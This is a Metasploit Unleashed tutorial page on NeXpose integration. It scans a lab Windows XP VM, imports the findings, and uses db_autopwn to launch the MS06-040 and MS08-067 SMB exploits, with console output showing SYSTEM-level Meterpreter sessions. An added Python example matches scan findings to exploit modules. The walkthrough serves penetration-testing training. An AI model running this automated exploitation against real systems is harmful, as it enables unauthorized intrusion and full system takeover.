Working With NeXpose

From Metasploit Unleashed

With the acquisition of Metasploit by Rapid7, there is now excellent compatibility between Metasploit and the NeXpose vulnerability scanner. Rapid7 has a community edition of their scanner that is available at http://www.rapid7.com/vulnerability-scanner.jsp. After we have installed and updated NeXpose, we run a full credentialed scan against our vulnerable WinXP VM.

[Figure: NeXpose scan results]



We create a new report in NeXpose and save the scan results in 'NeXpose Simple XML' format that we can later import into Metasploit. Next, we fire up Metasploit, create a new database, and use the 'db_import' command to auto-detect and import our scan results file.

msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > db_import /root/report.xml
[*] Importing 'NeXpose Simple XML' data
[*] Importing host 192.168.1.161
[*] Successfully imported /root/report.xml

Now, running the 'db_services' and 'db_vulns' commands will display the all-important vulnerability information that Metasploit now has at its disposal.

msf > db_services

Services
========

created_at               info                      name                               port  proto  state  updated_at               Host           Workspace
----------               ----                      ----                               ----  -----  -----  ----------               ----           ---------
2010-08-22 18:12:03 UTC                            ntp                                123   udp    open   2010-08-22 18:12:03 UTC  192.168.1.161  default
2010-08-22 18:12:05 UTC                            dce endpoint resolution            135   tcp    open   2010-08-22 18:12:05 UTC  192.168.1.161  default
2010-08-22 18:12:03 UTC                            cifs name service                  137   udp    open   2010-08-22 18:12:03 UTC  192.168.1.161  default
2010-08-22 18:12:03 UTC  Windows 2000 LAN Manager  cifs                               139   tcp    open   2010-08-22 18:12:03 UTC  192.168.1.161  default
2010-08-22 18:12:06 UTC                            snmp                               161   udp    open   2010-08-22 18:12:06 UTC  192.168.1.161  default
2010-08-22 18:12:05 UTC  Windows 2000 LAN Manager  cifs                               445   tcp    open   2010-08-22 18:12:05 UTC  192.168.1.161  default
2010-08-22 18:12:03 UTC                            microsoft remote display protocol  3389  tcp    open   2010-08-22 18:12:03 UTC  192.168.1.161  default

msf > db_vulns
[*] Time: 2010-08-22 18:12:00 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
[*] Time: 2010-08-22 18:12:01 UTC Vuln: host=192.168.1.161 name=NEXPOSE-windows-hotfix-ms06-035 refs=CVE-2006-1314,CVE-2006-1315,SECUNIA-21007,NEXPOSE-windows-hotfix-ms06-035
[*] Time: 2010-08-22 18:12:03 UTC Vuln: host=192.168.1.161 name=NEXPOSE-cifs-nt-0001 refs=CVE-1999-0519,BID-494,URL-http://www.hsc.fr/ressources/presentations/null_sessions/,NEXPOSE-cifs-nt-0001
[*] Time: 2010-08-22 18:12:03 UTC Vuln: host=192.168.1.161 name=NEXPOSE-generic-icmp-timestamp refs=CVE-1999-0524,NEXPOSE-generic-icmp-timestamp
[*] Time: 2010-08-22 18:12:05 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,URL-http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-001/,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-002/,NEXPOSE-windows-hotfix-ms09-001
[*] Time: 2010-08-22 18:12:08 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0186,CVE-1999-0254,CVE-1999-0472,CVE-1999-0516,CVE-1999-0517,CVE-2001-0514,CVE-2002-0109,BID-2807,NEXPOSE-snmp-read-0001
[*] Time: 2010-08-22 18:12:09 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0002 refs=CVE-1999-0516,CVE-1999-0517,CVE-2000-0147,BID-973,URL-ftp://ftp.sco.com/SSE/security_bulletins/SB-00.04a,URL-http://archives.neohapsis.com/archives/bugtraq/2000-02/0045.html,NEXPOSE-snmp-read-0002

We could certainly use this information to surgically attack specific vulnerabilities but since we are in our own lab environment and are not concerned about being stealthy, we will let 'db_autopwn' take full advantage of the situation.

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds

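To make the reference matching behind the '-x' option concrete, here is an added Python example (not part of Metasploit Unleashed or the framework itself) that parses 'db_vulns' output in the format shown above and pairs each finding with the modules that declare a shared reference, which is also how a defender can read the same output as a remediation worklist. The module-to-reference table is a constructed stand-in for the references Metasploit modules declare, not the framework's real module metadata, and the sample lines are a subset of the session above.

```python
import re
from collections import defaultdict

# Constructed sample: three db_vulns lines in the format msfconsole prints.
SAMPLE_DB_VULNS = """\
[*] Time: 2010-08-22 18:12:00 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
[*] Time: 2010-08-22 18:12:05 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,NEXPOSE-windows-hotfix-ms09-001
[*] Time: 2010-08-22 18:12:08 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0516,CVE-1999-0517,BID-2807,NEXPOSE-snmp-read-0001
"""

# Constructed, hypothetical module-to-reference table standing in for the
# references exploit modules declare; db_autopwn -x matches findings on these.
MODULE_REFS = {
    "exploit/windows/smb/ms06_040_netapi": {"CVE-2006-3439", "MSB-MS06-040"},
    "exploit/windows/smb/ms08_067_netapi": {"CVE-2008-4250", "MSB-MS08-067"},
}

VULN_RE = re.compile(r"^\[\*\] Time: (?P<time>.+? UTC) Vuln: (?P<fields>.+)$")

def parse_db_vulns(text):
    """Turn db_vulns output into records: host, port (int or None), proto, name, refs."""
    records = []
    for line in text.splitlines():
        m = VULN_RE.match(line)
        if not m:
            continue  # skip prompts and unrelated console output
        rec = {"time": m.group("time"), "port": None, "proto": None}
        for token in m.group("fields").split():
            key, _, value = token.partition("=")  # key=value pairs, no spaces inside
            rec[key] = value
        rec["port"] = int(rec["port"]) if rec["port"] else None  # host-level findings lack a port
        rec["refs"] = rec["refs"].split(",")
        records.append(rec)
    return records

def cves_by_host(records):
    """Collapse findings to the sorted CVE identifiers stored for each host."""
    out = defaultdict(set)
    for rec in records:
        out[rec["host"]].update(r for r in rec["refs"] if r.startswith("CVE-"))
    return {host: sorted(cves) for host, cves in out.items()}

def match_by_reference(records, module_refs=MODULE_REFS):
    """Pair each finding with modules sharing a reference (the principle behind -x)."""
    matches = []
    for rec in records:
        for module, refs in module_refs.items():
            if refs & set(rec["refs"]):
                matches.append((rec["host"], rec["port"], rec["name"], module))
    return matches

if __name__ == "__main__":
    recs = parse_db_vulns(SAMPLE_DB_VULNS)
    print(cves_by_host(recs))
    for host, port, name, module in match_by_reference(recs):
        print(f"{host}:{port} {name} -> {module}")
```

Findings that match a module are the ones to patch first; the rest of the CVE list still belongs on the remediation ticket.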
We will tell db_autopwn to attack all targets using the vulnerabilities that are gathered in the database and watch the magic.

msf > db_autopwn -x -e
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.161:445...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.161:445...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.1.101:42662 -> 192.168.1.161:4265) at 2010-08-22 12:14:06 -0600
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution...

msf >

Just like that, we have a Meterpreter session opened for us!

msf > sessions -l

Active sessions
===============

  Id  Type         Information                            Connection
  --  ----         -----------                            ----------
  1   meterpreter  NT AUTHORITY\SYSTEM @ XEN-XP-SP2-BARE  192.168.1.101:42662 -> 192.168.1.161:4265

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: XEN-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter >

NeXpose from msfconsole

The Metasploit/NeXpose integration is not limited to simply importing scan results files. You can run NeXpose scans directly from msfconsole by first making use of the 'nexpose' plugin.

msf > load nexpose

 ____             _     _ _____   _   _     __  __
|  _ \ __ _ _ __ (_) __| |___  | | \ | | ___\ \/ /_ __   ___  ___  ___
| |_) / _` | '_ \| |/ _` |  / /  |  \| |/ _ \\  /| '_ \ / _ \/ __|/ _ \
|  _ < (_| | |_) | | (_| | / /   | |\  |  __//  \| |_) | (_) \__ \  __/
|_| \_\__,_| .__/|_|\__,_|/_/    |_| \_|\___/_/\_\ .__/ \___/|___/\___|
           |_|                                   |_|


[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose

msf > help

NeXpose Commands
================

    Command             Description
    -------             -----------
    nexpose_activity    Display any active scan jobs on the NeXpose instance
    nexpose_connect     Connect to a running NeXpose instance ( user:pass@host[:port] )
    nexpose_disconnect  Disconnect from an active NeXpose instance
    nexpose_discover    Launch a scan but only perform host and minimal service discovery
    nexpose_dos         Launch a scan that includes checks that can crash services and devices (caution)
    nexpose_exhaustive  Launch a scan covering all TCP ports and all authorized safe checks
    nexpose_scan        Launch a NeXpose scan against a specific IP range and import the results

Before running a scan against a target, we first need to connect to our server running NeXpose by using the 'nexpose_connect' command along with the credentials for the NeXpose instance. Note that you will have to append 'ok' to the end of the connect string to acknowledge that the SSL connections are not verified.

msf > nexpose_connect dookie:s3cr3t@192.168.1.152
[-] Warning: SSL connections are not verified in this release, it is possible for an attacker
[-]          with the ability to man-in-the-middle the NeXpose traffic to capture the NeXpose
[-]          credentials. If you are running this on a trusted network, please pass in 'ok'
[-]          as an additional parameter to this command.
msf > nexpose_connect dookie:s3cr3t@192.168.1.152 ok
[*] Connecting to NeXpose instance at 192.168.1.152:3780 with username dookie...
msf >

Now that we are connected to our server, we can run a vulnerability scan right from within Metasploit.

msf > nexpose_discover -h
Usage: nexpose_scan [options]

OPTIONS:

    -E   Exclude hosts in the specified range from the scan
    -I   Only scan systems with an address within the specified range
    -P        Leave the scan data on the server when it completes (this counts against the maximum licensed IPs)
    -R   Specify a minimum exploit rank to use for automated exploitation
    -X        Automatically launch all exploits by matching reference and port after the scan completes (unsafe)
    -c   Specify credentials to use against these targets (format is type:user:pass[@host[:port]]
    -d        Scan hosts based on the contents of the existing database
    -h        This help menu
    -n   The maximum number of IPs to scan at a time (default is 32)
    -s   The directory to store the raw XML files from the NeXpose instance (optional)
    -t   The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit)
    -v        Display diagnostic information about the scanning process
    -x        Automatically launch all exploits by matching reference after the scan completes (unsafe)

msf > nexpose_discover 192.168.1.161
[*] Scanning 1 addresses with template aggressive-discovery in sets of 32
[*] Completed the scan of 1 addresses
msf >

Again, we run 'db_services' and 'db_vulns' and we can see that the results are of the same quality as those we imported via the XML file.

msf > db_services

Services
========

created_at               info                      name                               port  proto  state  updated_at               Host           Workspace
----------               ----                      ----                               ----  -----  -----  ----------               ----           ---------
2010-08-22 18:24:28 UTC                            ntp                                123   udp    open   2010-08-22 18:24:28 UTC  192.168.1.161  default
2010-08-22 18:24:30 UTC                            dce endpoint resolution            135   tcp    open   2010-08-22 18:24:30 UTC  192.168.1.161  default
2010-08-22 18:24:28 UTC                            cifs name service                  137   udp    open   2010-08-22 18:24:28 UTC  192.168.1.161  default
2010-08-22 18:24:28 UTC  Windows 2000 LAN Manager  cifs                               139   tcp    open   2010-08-22 18:24:28 UTC  192.168.1.161  default
2010-08-22 18:24:30 UTC                            snmp                               161   udp    open   2010-08-22 18:24:30 UTC  192.168.1.161  default
2010-08-22 18:24:30 UTC  Windows 2000 LAN Manager  cifs                               445   tcp    open   2010-08-22 18:24:30 UTC  192.168.1.161  default
2010-08-22 18:24:28 UTC                            microsoft remote display protocol  3389  tcp    open   2010-08-22 18:24:28 UTC  192.168.1.161  default

msf > db_vulns
[*] Time: 2010-08-22 18:24:25 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
[*] Time: 2010-08-22 18:24:26 UTC Vuln: host=192.168.1.161 name=NEXPOSE-windows-hotfix-ms06-035 refs=CVE-2006-1314,CVE-2006-1315,SECUNIA-21007,NEXPOSE-windows-hotfix-ms06-035
[*] Time: 2010-08-22 18:24:27 UTC Vuln: host=192.168.1.161 name=NEXPOSE-cifs-nt-0001 refs=CVE-1999-0519,BID-494,URL-http://www.hsc.fr/ressources/presentations/null_sessions/,NEXPOSE-cifs-nt-0001
[*] Time: 2010-08-22 18:24:28 UTC Vuln: host=192.168.1.161 name=NEXPOSE-generic-icmp-timestamp refs=CVE-1999-0524,NEXPOSE-generic-icmp-timestamp
[*] Time: 2010-08-22 18:24:30 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,URL-http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-001/,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-002/,NEXPOSE-windows-hotfix-ms09-001
[*] Time: 2010-08-22 18:24:33 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0186,CVE-1999-0254,CVE-1999-0472,CVE-1999-0516,CVE-1999-0517,CVE-2001-0514,CVE-2002-0109,BID-2807,NEXPOSE-snmp-read-0001
[*] Time: 2010-08-22 18:24:35 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0002 refs=CVE-1999-0516,CVE-1999-0517,CVE-2000-0147,BID-973,URL-ftp://ftp.sco.com/SSE/security_bulletins/SB-00.04a,URL-http://archives.neohapsis.com/archives/bugtraq/2000-02/0045.html,NEXPOSE-snmp-read-0002

Because it is so much fun, we will let db_autopwn take over again.

msf > db_autopwn -x -e
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.161:445...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.161:445...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.1.101:51373 -> 192.168.1.161:35156) at 2010-08-22 12:26:49 -0600
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution...

msf > sessions -l

Active sessions
===============

  Id  Type         Information                            Connection
  --  ----         -----------                            ----------
  2   meterpreter  NT AUTHORITY\SYSTEM @ XEN-XP-SP2-BARE  192.168.1.101:51373 -> 192.168.1.161:35156

msf > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer: XEN-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > exit

[*] Meterpreter session 2 closed.  Reason: User exit
msf >

As we can see, this integration, while still in its early stages, is very beneficial and adds incredible power to Metasploit.
